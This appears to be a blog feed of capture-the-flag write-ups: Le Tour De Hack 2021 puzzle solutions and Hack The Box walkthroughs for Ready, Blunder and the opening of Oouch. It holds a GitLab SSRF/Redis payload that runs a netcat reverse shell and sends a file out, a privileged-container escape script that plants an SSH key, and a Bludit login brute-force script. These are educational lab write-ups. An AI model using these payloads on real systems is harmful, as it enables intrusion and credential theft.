class="mi">18</span><span class="p">,</span> <span class="mi">23</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">41</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">14</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">55</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">67</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">44</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">19</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">18</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">35</span><span class="p">,</span> <span class="mi">56</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">28</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">32</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">57</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">31</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">33</span><span class="p">,</span> <span class="mi">11</span><span class="p">,</span> <span class="mi">37</span><span class="p">,</span> <span class="mi">36</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">51</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">22</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">chunks</span><span class="p">(</span><span class="n">lst</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">lst</span><span class="p">),</span> <span class="n">n</span><span class="p">):</span>
<span class="k">yield</span> <span class="n">lst</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">n</span><span class="p">]</span>
<span class="n">numarr</span> <span class="o">=</span> <span class="n">chunks</span><span class="p">(</span><span class="n">nums</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">numarr</span><span class="p">:</span>
<span class="k">print</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">sum</span><span class="p">(</span><span class="n">i</span><span class="p">)),</span> <span class="n">end</span><span class="o">=</span><span class="s">""</span><span class="p">)</span>
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 asci.py
Hello and welcome, I would like to inform you that doing this by hand would be a long and tedious proccess, ltdh21<span class="o">{</span>7h475_pr377y_wh4ck_y000<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="spot-the-difference">Spot the Difference</h3>
<ul>
<li>Description: Can you find all the differences? Please circle each difference you find. If you can find all 10 differences you earn a gold star!</li>
<li>Solves: 15</li>
</ul>
<p><img src="https://jdmce.com/assets/ltdh21/SpotTheDiffimg1.png" alt="Spot the Difference" /></p>
<p>We are given two images. The name of the challenge suggests we diff the two images.</p>
<p>I wrote the following python script to diff the two images and save the result as a new image:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">ImageChops</span>
<span class="n">image1</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"image1.png"</span><span class="p">)</span>
<span class="n">image2</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"image2.png"</span><span class="p">)</span>
<span class="n">difference</span> <span class="o">=</span> <span class="n">ImageChops</span><span class="p">.</span><span class="n">difference</span><span class="p">(</span><span class="n">image2</span><span class="p">,</span> <span class="n">imagedif</span><span class="p">)</span>
<span class="n">difference</span><span class="p">.</span><span class="n">save</span><span class="p">(</span><span class="s">"dif.png"</span><span class="p">)</span>
</code></pre></div></div>
<p>The resulting image looks like this:</p>
<p><img src="https://jdmce.com/assets/ltdh21/dif.png" alt="Difference" /></p>
<p>I opened the image in StegSolve and found the flag</p>
<p><img src="https://jdmce.com/assets/ltdh21/spottheflag.jpg" alt="flag" /></p>
<hr />
<h2 id="reverse-engineering">Reverse Engineering</h2>
<h3 id="wrong-password">Wrong password</h3>
<ul>
<li>Description: Wrong Password! You failed the vibe check.</li>
<li>Solves: 18</li>
</ul>
<p>We are given a main.exe binary. Running strings on the file we find:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strings main.exe
!This program cannot be run in DOS mode.
/(Rich
.text
`.rdata
@.data
.reloc
h@1A
...
DecodePointer
Neve_rules
Input the password:
Correct password!
Here's the secret ;) : bHRkaDIxe3k0eV95MHVfZjB1bmRfbTN9
Wrong password, try another
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
...
</code></pre></div></div>
<p>We base 64 decode the secret to reveal the flag.</p>
<hr />
<h2 id="crypto">Crypto</h2>
<h3 id="in-this-book-i-write">In this Book I write</h3>
<ul>
<li>Description: (7, 6, 3) (8, 2, 8) (1, 10, 6) (3, 8, 1) (2, 8, 2)</li>
<li>Solves: 23</li>
</ul>
<p>We are given a txt file and the description above. Each set of 3 numbers referse to the (paragraph, line, word), by counting each one out manually we can construct the flag</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ltdh21{found_my_flag_for_me}
</code></pre></div></div>
<hr />John McEwanLe Tour De Hack 2021 was an online CTF event organised by ENUSEC[HTB] Ready WriteUp2021-05-15T20:00:00+01:002021-05-15T20:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Ready-Writeup<p><img src="https://jdmce.com/assets/ready/ready.jpg" alt="Ready" /></p>
<p>Ready is a medium difficulty machine on Hack the Box. We find an outdated instance of GitLab, we exploit a known RCE vulnerability to get a shell. Some simple enumeration leads to User. We then break out of the docker container to get Root.</p>
<p>I begin with an nmap scan.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-o</span> scans/nmap 10.10.10.220
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.91 scan initiated Mon Dec 28 10:05:11 2020 as: nmap -sC -sV -o scans/nmap 10.10.10.220</span>
Nmap scan report <span class="k">for </span>10.10.10.220
Host is up <span class="o">(</span>0.073s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae <span class="o">(</span>RSA<span class="o">)</span>
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb <span class="o">(</span>ED25519<span class="o">)</span>
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries <span class="o">(</span>15 shown<span class="o">)</span>
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/<span class="k">*</span>/edit /users /help
|_/s/ /snippets/new /snippets/<span class="k">*</span>/edit
|_http-title: GitLab is not responding <span class="o">(</span>502<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Mon Dec 28 10:05:54 2020 -- 1 IP address (1 host up) scanned in 43.20 seconds</span>
</code></pre></div></div>
<p>There is only 2 ports open, 22 and 5080. Lets check out port 5080.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-login.png" alt="Gitlab login / Register" /></p>
<p>I register an account and login.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-welcome.jpg" alt="Gitlab Welcome Page" /></p>
<p>After clicking around for a while I notice the gitlab version number on the help page, with a warning about gitlab being out of date.</p>
<p><img src="https://jdmce.com/assets/ready/gitlab-version.jpg" alt="Gitlab Version" /></p>
<p>Some googling reveals an RCE vulnerability in this version of gitlab.</p>
<p><a href="https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/">GitLab 11.4.7 Remote Code Execution</a></p>
<p>To get Remote code execution we follow the steps in the article.</p>
<ul>
<li>Create a new project</li>
<li>Select “Import Project”</li>
<li>click “Repo by URL”</li>
<li>At this stage we need a payload, we can use the one from the article</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 10.10.14.2 9001 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
exec
/ssrf.git
</code></pre></div></div>
<p>We URL encode the payload</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%2010%2E10%2E14%2E10%209001%20%2de%20%2fbin%2fbash%20%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
</code></pre></div></div>
<p>And add it to the URL</p>
<ul>
<li>Before Creating the project we need to start a listener to catch the shell</li>
</ul>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<ul>
<li>Click Create</li>
</ul>
<p>We get a shell!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>998<span class="o">(</span>git<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>990<span class="o">(</span>git<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>998<span class="o">(</span>git<span class="o">)</span>
</code></pre></div></div>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>The shell we are in is a docker image, to get the user flag we will need to get root in the docker container. After some enumeration we find an interesting file /opt/backup/gitlab.rb</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>gitlab.rb
...
<span class="c"># gitlab_rails['smtp_enable'] = true </span>
<span class="c"># gitlab_rails['smtp_address'] = "smtp.server" </span>
<span class="c"># gitlab_rails['smtp_port'] = 465 </span>
<span class="c"># gitlab_rails['smtp_user_name'] = "smtp user" </span>
gitlab_rails[<span class="s1">'smtp_password'</span><span class="o">]</span> <span class="o">=</span> <span class="s2">"wW59U!ZKMbG9+*#h"</span>
<span class="c"># gitlab_rails['smtp_domain'] = "example.com" </span>
<span class="c"># gitlab_rails['smtp_authentication'] = "login" </span>
<span class="c"># gitlab_rails['smtp_enable_starttls_auto'] = true </span>
<span class="c"># gitlab_rails['smtp_tls'] = false</span>
...
</code></pre></div></div>
<p>We can use the password to change user to root within the docker container. And get the User flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>su
password: wW59U!ZKMbG9+<span class="k">*</span><span class="c">#h</span>
root@gitlab:/opt/backup# <span class="nb">cat</span> ~/user.txt
</code></pre></div></div>
<h3 id="getting-root">Getting Root</h3>
<p>The docker container that we are still in is a privileged container, meaning it was run with the –privileged flag.</p>
<p><a href="https://betterprogramming.pub/escaping-docker-privileged-containers-a7ae7d17f5a1">Privileged Containers</a>.</p>
<p>By following the article we can write the following bash script. Replacing your_id_rsa.pub with your id_rsa.pub contents.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> /tmp/JDMCE <span class="o">&&</span> mount <span class="nt">-t</span> cgroup <span class="nt">-o</span> rdma cgroup /tmp/JDMCE <span class="o">&&</span> <span class="nb">mkdir</span> /tmp/JDMCE/x
<span class="nb">echo </span>1 <span class="o">></span> /tmp/JDMCE/x/notify_on_release
<span class="nv">host_path</span><span class="o">=</span><span class="sb">`</span><span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'s/.*\perdir=\([^,]*\).*/\1/p'</span> /etc/mtab<span class="sb">`</span>
<span class="nb">echo</span> <span class="s2">"</span><span class="nv">$host_path</span><span class="s2">/cmd"</span> <span class="o">></span> /tmp/JDMCE/release_agent
<span class="nb">echo</span> <span class="s1">'#!/bin/sh'</span> <span class="o">></span> /cmd
<span class="nb">echo</span> <span class="s2">"echo 'your_id_rsa.pub' > /root/.ssh/authorized_keys"</span> <span class="o">>></span> /cmd
<span class="nb">chmod </span>a+x /cmd
sh <span class="nt">-c</span> <span class="s2">"echo </span><span class="se">\$\$</span><span class="s2"> > /tmp/JDMCE/x/cgroup.procs"</span>
</code></pre></div></div>
<p>We transfer the script to the taget machine, make it executable and run it. The script will add our id_rsa.pub to the authorized_keys file on the target.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://10.10.14.2/exploit.sh
<span class="nb">chmod</span> +x exploit.sh
./exploit.sh
</code></pre></div></div>
<p>We can then SSH in and get the root flag</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ready:~# <span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</code></pre></div></div>John McEwanReady is a medium difficulty machine on Hack the Box.[HTB] Blunder WriteUp2020-10-17T13:00:00+01:002020-10-17T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Blunder-Writeup<p><img src="https://jdmce.com/assets/blunder/blunder.jpg" alt="Blunder" /></p>
<p>Blunder is a fairly easy machine on Hack The box. We bypass the brute force mitigation to brute force the password to the CMS, then use an image upload vulnerability to get access. Then some enumeration takes us to the second user, then root.</p>
<p>As always, I begin by running an nmap scan</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-p-</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.191
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Mon Jun 1 18:30:36 2020 as: nmap -sC -sV -p- -oN nmap/nmap 10.10.10.191</span>
Nmap scan report <span class="k">for </span>10.10.10.191
Host is up <span class="o">(</span>0.023s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Blunder | A blunder of interesting facts
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Mon Jun 1 18:35:55 2020 -- 1 IP address (1 host up) scanned in 319.13 seconds</span>
</code></pre></div></div>
<p>Only 2 ports are open, 80 and 21. The FTP server on port 21 refuses connection so lets look at the site running on port 80.</p>
<p><img src="https://jdmce.com/assets/blunder/website.jpg" alt="Website" /></p>
<p>The website is fairly simple, poking around we don’t really find much of any use. Next I run a dirbuster scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jun 01 19:05:18 BST 2020
--------------------------------
http://10.10.10.191:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/bl-themes/
/admin/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/stephen-king-0
/stadia
/about
/usb
/install.php
/robots.txt
/todo.txt
--------------------------------
</code></pre></div></div>
<p>Dirbuster finds a few interesting things! First a file called todo.txt:</p>
<pre><code class="language-txt">-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
</code></pre>
<p>This gives us a few clues, fergus must be a user and the CMS has likely not been updated yet.</p>
<p>Navigating to /admin we find the login page for Bludit, the CMS being used.</p>
<p><img src="https://jdmce.com/assets/blunder/cms.jpg" alt="CMS" /></p>
<p>We already have a potential username (fergus) but no password. We can generate a wordlist based on the website content by using cewl</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cewl 10.10.10.191 <span class="o">></span> wordlist.txt
</code></pre></div></div>
<p>From the page source code we can identify the version of Bludit which is running, 3.9.2. Googling for exploits relating to this version we find this <a href="https://rastating.github.io/bludit-brute-force-mitigation-bypass/">blog post</a>. We can then use the proof of concept with our wordlist to brute force the password for fergus. (Note that the section for generating 50 passwords is not needed as we are using our own wordlist.)</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">requests</span>
<span class="n">host</span> <span class="o">=</span> <span class="s">'http://10.10.10.191'</span>
<span class="n">login_url</span> <span class="o">=</span> <span class="n">host</span> <span class="o">+</span> <span class="s">'/admin/login'</span>
<span class="n">username</span> <span class="o">=</span> <span class="s">'admin'</span>
<span class="n">wordlist</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"wordlist.txt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
<span class="c1"># Generate 50 incorrect passwords
# for i in range(50):
# wordlist.append('Password{i}'.format(i = i))
</span>
<span class="c1"># Add the correct password to the end of the list
#wordlist.append('adminadmin')
</span>
<span class="k">for</span> <span class="n">password</span> <span class="ow">in</span> <span class="n">wordlist</span><span class="p">:</span>
<span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">Session</span><span class="p">()</span>
<span class="n">login_page</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">login_url</span><span class="p">)</span>
<span class="n">csrf_token</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">search</span><span class="p">(</span><span class="s">'input.+?name="tokenCSRF".+?value="(.+?)"'</span><span class="p">,</span> <span class="n">login_page</span><span class="p">.</span><span class="n">text</span><span class="p">).</span><span class="n">group</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">'[*] Trying: {p}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">p</span> <span class="o">=</span> <span class="n">password</span><span class="p">))</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
<span class="s">'X-Forwarded-For'</span><span class="p">:</span> <span class="n">password</span><span class="p">,</span>
<span class="s">'User-Agent'</span><span class="p">:</span> <span class="s">'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'</span><span class="p">,</span>
<span class="s">'Referer'</span><span class="p">:</span> <span class="n">login_url</span>
<span class="p">}</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">{</span>
<span class="s">'tokenCSRF'</span><span class="p">:</span> <span class="n">csrf_token</span><span class="p">,</span>
<span class="s">'username'</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span>
<span class="s">'password'</span><span class="p">:</span> <span class="n">password</span><span class="p">,</span>
<span class="s">'save'</span><span class="p">:</span> <span class="s">''</span>
<span class="p">}</span>
<span class="n">login_result</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">login_url</span><span class="p">,</span> <span class="n">headers</span> <span class="o">=</span> <span class="n">headers</span><span class="p">,</span> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">,</span> <span class="n">allow_redirects</span> <span class="o">=</span> <span class="bp">False</span><span class="p">)</span>
<span class="k">if</span> <span class="s">'location'</span> <span class="ow">in</span> <span class="n">login_result</span><span class="p">.</span><span class="n">headers</span><span class="p">:</span>
<span class="k">if</span> <span class="s">'/admin/dashboard'</span> <span class="ow">in</span> <span class="n">login_result</span><span class="p">.</span><span class="n">headers</span><span class="p">[</span><span class="s">'location'</span><span class="p">]:</span>
<span class="k">print</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="s">'SUCCESS: Password found!'</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">'Use {u}:{p} to login.'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">u</span> <span class="o">=</span> <span class="n">username</span><span class="p">,</span> <span class="n">p</span> <span class="o">=</span> <span class="n">password</span><span class="p">))</span>
<span class="k">print</span><span class="p">()</span>
<span class="k">break</span>
</code></pre></div></div>
<p>Running the exploit returns the password <code class="language-plaintext highlighter-rouge">RolandDeschain</code>. We can now login as fergus!</p>
<p><img src="https://jdmce.com/assets/blunder/loggedin.jpg" alt="Logged In" /></p>
<p>Bludit 3.9.2 has a vulnerability relating to the upload functionality, there is a metasploit module available.</p>
<p><img src="https://jdmce.com/assets/blunder/msf.jpg" alt="Metasploit" /></p>
<p>We supply the username, password and correct addresses and get a shell as www-data.</p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>After some time spent doing basic enumeration we find a file /var/www/bludit-3.9.2/bl-content/databases/users.php</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span> <span class="nb">defined</span><span class="p">(</span><span class="s1">'BLUDIT'</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s1">'Bludit CMS.'</span><span class="p">);</span> <span class="cp">?></span>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
</code></pre></div></div>
<p>It contains a hashed password for both fergus and hugo(admin). The passwords are hashed using sha1, which is easily cracked using online tools. I used <a href="https://crackstation.net/">CrackStation</a>.</p>
<p>hugo:Password120</p>
<p>we can now login as hugo and get user.txt!</p>
<h3 id="getting-root">Getting root</h3>
<p>As hugo, we see that we can run /bin/bash as any user other than root, however the verion of sudo is outdated and so this can be bypassed to gain root:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> <span class="nt">-l</span>
Password: Password120
User hugo may run the following commands on Blunder:
<span class="o">(</span>All, <span class="o">!</span>root<span class="o">)</span> /bin/bash
</code></pre></div></div>
<p><img src="https://jdmce.com/assets/blunder/root.jpg" alt="Root" /></p>John McEwanBlunder is a fairly easy machine on Hack The box. We bypass the brute force mitigation to brute force the password to the CMS[HTB] Oouch WriteUp2020-08-01T13:00:00+01:002020-08-01T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Oouch-Writeup<p><img src="https://jdmce.com/assets/oouch/oouch.jpg" alt="Oouch" /></p>
<p>Oouch is a hard machine on Hack the Box, the foothold requires exploiting a misconfiguration in Oauth, then exploiting dbus to gain root access.</p>
<p>I begin as always with an nmap scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.80 scan initiated Fri Jul 3 20:07:53 2020 as: nmap -sC -sV -oN scans/nmap 10.10.10.177
WARNING: Service 10.10.10.177:8000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.10.177
Host is up (0.030s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 49 Feb 11 19:34 project.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.53
| Logged in as ftp
| TYPE: ASCII
| Session bandwidth limit in byte/s is 30000
| Session timeout in seconds is 300
